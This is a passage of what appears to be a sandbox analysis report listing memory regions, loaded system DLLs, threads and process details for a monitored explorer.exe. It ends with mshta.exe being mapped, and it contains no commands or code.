mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 748 start_va = 0x7ffc59a60000 end_va = 0x7ffc59b01fff monitored = 0 entry_point = 0x7ffc59a80a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 749 start_va = 0x7ffc570e0000 end_va = 0x7ffc571edfff monitored = 0 entry_point = 0x7ffc5712eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 750 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 751 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 752 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 753 start_va = 0x840000 end_va = 0x982fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 754 start_va = 0x680000 end_va = 0x6b8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 755 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 756 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 757 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 758 start_va = 0xb60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 759 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 760 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 761 start_va = 0x680000 end_va = 0x680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 762 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 763 start_va = 0x1f60000 end_va = 0x235afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 764 start_va = 0x6a0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 765 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 766 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 767 start_va = 0x2360000 end_va = 0x243cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 768 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 769 start_va = 0x2360000 end_va = 0x2696fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 770 start_va = 0x26a0000 end_va = 0x271ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 771 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 772 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 773 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 774 start_va = 0x6d0000 end_va = 0x6d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 775 start_va = 0x700000 end_va = 0x712fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 776 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 777 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 778 start_va = 0x2720000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 779 start_va = 0x7ffc52890000 end_va = 0x7ffc52d2ffff monitored = 0 entry_point = 0x7ffc52928740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 780 start_va = 0x7ffc52840000 end_va = 0x7ffc5288ffff monitored = 0 entry_point = 0x7ffc52842580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 785 start_va = 0x27a0000 end_va = 0x287cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 787 start_va = 0x27a0000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 793 start_va = 0x7ffc59500000 end_va = 0x7ffc59992fff monitored = 0 entry_point = 0x7ffc5950f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Thread: id = 18 os_tid = 0x838 Thread: id = 19 os_tid = 0x868 Thread: id = 20 os_tid = 0x188 Thread: id = 21 os_tid = 0x738 Thread: id = 22 os_tid = 0x8d0 Process: id = "3" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x20b8f000" os_pid = "0xe6c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 794 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 795 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 796 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 797 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 798 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 799 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 800 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 801 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 802 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 803 start_va = 0x1d0000 end_va = 0x1d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 804 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 805 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 806 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 807 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 808 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 809 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 810 start_va = 0x4a0000 end_va = 0x4a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 811 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 812 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 813 start_va = 0x4d0000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 814 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 815 start_va = 0x6b0000 end_va = 0x837fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 816 start_va = 0x840000 end_va = 0x9c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 817 start_va = 0x9d0000 end_va = 0x1dcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 818 start_va = 0x1dd0000 end_va = 0x21cafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001dd0000" filename = "" Region: id = 819 start_va = 0x21d0000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 820 start_va = 0x2250000 end_va = 0x22cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 821 start_va = 0x22d0000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 822 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002390000" filename = "" Region: id = 823 start_va = 0x23a0000 end_va = 0x26d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 824 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 825 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 826 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 827 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 828 start_va = 0x7ff6ca9b0000 end_va = 0x7ff6cadf7fff monitored = 0 entry_point = 0x7ff6caa4e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 829 start_va = 0x7ffc52840000 end_va = 0x7ffc5288ffff monitored = 0 entry_point = 0x7ffc52842580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 830 start_va = 0x7ffc52890000 end_va = 0x7ffc52d2ffff monitored = 0 entry_point = 0x7ffc52928740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 831 start_va = 0x7ffc53100000 end_va = 0x7ffc531b0fff monitored = 0 entry_point = 0x7ffc531108f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 832 start_va = 0x7ffc570e0000 end_va = 0x7ffc571edfff monitored = 0 entry_point = 0x7ffc5712eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 833 start_va = 0x7ffc59500000 end_va = 0x7ffc59992fff monitored = 0 entry_point = 0x7ffc5950f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 834 start_va = 0x7ffc59a60000 end_va = 0x7ffc59b01fff monitored = 0 entry_point = 0x7ffc59a80a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 835 start_va = 0x7ffc59b10000 end_va = 0x7ffc59db7fff monitored = 0 entry_point = 0x7ffc59ba3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 836 start_va = 0x7ffc59dc0000 end_va = 0x7ffc59de1fff monitored = 0 entry_point = 0x7ffc59dc1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 837 start_va = 0x7ffc59ed0000 end_va = 0x7ffc59fb2fff monitored = 0 entry_point = 0x7ffc59f07da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 838 start_va = 0x7ffc5a2e0000 end_va = 0x7ffc5a358fff monitored = 0 entry_point = 0x7ffc5a2ffb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 839 start_va = 0x7ffc5a3a0000 end_va = 0x7ffc5a525fff monitored = 0 entry_point = 0x7ffc5a3ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 840 start_va = 0x7ffc5a7b0000 end_va = 0x7ffc5a845fff monitored = 0 entry_point = 0x7ffc5a7d5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 841 start_va = 0x7ffc5a950000 end_va = 0x7ffc5aa4ffff monitored = 0 entry_point = 0x7ffc5a990f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 842 start_va = 0x7ffc5b590000 end_va = 0x7ffc5b5aefff monitored = 0 entry_point = 0x7ffc5b595d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 843 start_va = 0x7ffc5bab0000 end_va = 0x7ffc5badcfff monitored = 0 entry_point = 0x7ffc5bac9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 844 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 845 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 846 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 847 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 848 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 849 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 850 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 851 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 852 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 853 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 854 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 855 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 856 start_va = 0x7ffc5e1e0000 end_va = 0x7ffc5e2a0fff monitored = 0 entry_point = 0x7ffc5e200da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 857 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 858 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 859 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 860 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 861 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 862 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 863 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 864 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 865 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 866 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 867 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 868 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 869 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 870 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 871 start_va = 0x7ffc52e60000 end_va = 0x7ffc530d3fff monitored = 0 entry_point = 0x7ffc52ed0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 872 start_va = 0x560000 end_va = 0x560fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 873 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 874 start_va = 0x560000 end_va = 0x563fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 875 start_va = 0x26e0000 end_va = 0x2724fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 876 start_va = 0x580000 end_va = 0x583fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 877 start_va = 0x2730000 end_va = 0x27bdfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 878 start_va = 0x27c0000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 879 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 880 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 881 start_va = 0x2350000 end_va = 0x2357fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 882 start_va = 0x2360000 end_va = 0x2367fff monitored = 0 entry_point = 0x2361900 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe") Region: id = 883 start_va = 0x2370000 end_va = 0x2370fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mshta.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mshta.exe.mui") Region: id = 884 start_va = 0x2360000 end_va = 0x2367fff monitored = 0 entry_point = 0x2361900 region_type = mapped_file name = "mshta.exe" filename = "\\Windows\\SysWOW64\\mshta.exe" (normalized: 